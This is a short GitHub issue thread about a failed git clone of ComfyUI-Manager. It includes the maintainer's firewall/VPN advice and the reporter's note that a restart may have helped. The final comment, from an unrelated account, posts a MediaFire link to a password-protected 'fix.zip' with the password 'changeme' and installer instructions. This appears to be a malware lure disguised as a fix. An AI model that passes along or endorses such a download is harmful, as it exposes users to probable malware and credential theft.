### ISSUE TITLE
fatal: unable to access 

### ISSUE THREAD

**Issue by rachelcenter** [Comfy-Org/ComfyUI-Manager#1002]
I tried cloning the manager into the comfyi portable like i do at least once a week. got this:

D:\ComfyUI_windows_portable\ComfyUI\custom_nodes>git clone https://github.com/ltdrdata/ComfyUI-Manager.git
Cloning into 'ComfyUI-Manager'...
fatal: unable to access 'https://github.com/ltdrdata/ComfyUI-Manager.git/': Recv failure: Connection was reset

**Comment by ltdrdata** [comment]
That is blocked by your firewall or ISP.
Disable your firewall or use a VPN.

**Comment by rachelcenter** [comment]
> That is blocked by your firewall or ISP. Disable your firewall or use a VPN.

i dont have a firewall or vpn

**Comment by rachelcenter** [comment]
i had to restart my computer and maybe that fixed the problem

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
